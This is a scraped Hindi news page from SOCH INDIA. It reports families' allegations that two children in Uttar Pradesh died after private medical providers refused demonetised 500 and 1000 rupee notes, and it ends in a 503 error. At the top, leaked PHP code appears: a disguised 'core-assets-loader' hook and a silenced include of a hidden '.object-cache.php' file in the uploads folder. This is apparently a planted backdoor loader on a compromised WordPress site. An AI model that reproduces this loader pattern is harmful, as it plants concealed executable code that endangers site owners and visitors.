add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); नोटबंदी की दर्दनाक कहानी: यूपी में इलाज में देरी से दो बच्चों की मौत – SOCH INDIA
Menu

अपराध समाचार
नोटबंदी की दर्दनाक कहानी: यूपी में इलाज में देरी से दो बच्चों की मौत

nobanner

नोटबंदी के दर्दनाक पहलु भी सामने आ रहे हैं. यूपी में दो जगहों पर इलाज में देरी की वजह से दो बच्चों की मौत हो गई. परिवार का आरोप है कि अस्पताल में 500 और हजार के नोट नहीं लिए गए और इलाज में देरी की वजह मौत बन गई.

अस्पताल ने 500-1000 के नोट लेने से किया इनकार

यूपी के मुरादाबाद में सर सैयद नगर करुला की मियां कालोनी में 13 साल के आफताब को कल बुखार के बाद एक प्राइवेट अस्पताल ले जाया गया. परिवार का आरोप है कि अस्पताल ने पांच सौ और हजार रुपये के नोट लेने से मना कर दिया और इलाज में देरी की वजह से आफताब की मौत हो गई.

खुले नोट नहीं होने की वजह से बच्चे की मौत

बेटे को खोने वाला परिवार मोदी सरकार के फैसले को कोस रहा है और अस्पताल के खिलाफ कानूनी कार्रवाई की तैयारी कर रहा है. यूपी के मैनपुरी में इस परिवार का आरोप है कि खुले नोट नहीं होने की वजह से इनके बच्चे की मौत हो गई. परिवार ने मैनपुरी के एक डॉक्टर पर आरोप लगाया है.

दर्दनाक साबित हो रहा है मोदी सरकार का फैसला

वहीं, अब प्रशासन जांच कर कार्रवाई की बात कर रहा है. मोदी सरकार ने सरकारी अस्पताल में 500 और हजार के नोट लेने को मंजूरी दी है, लेकिन प्राइवेट अस्पताल में ऐसा नहीं है. यही वजह है कि निजी अस्पताल 500 और हजार रुपये के नोट लेने से मना कर रहे हैं और इसका अंजाम दर्दनाक भी साबित हो रहा है.

Share this: 503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.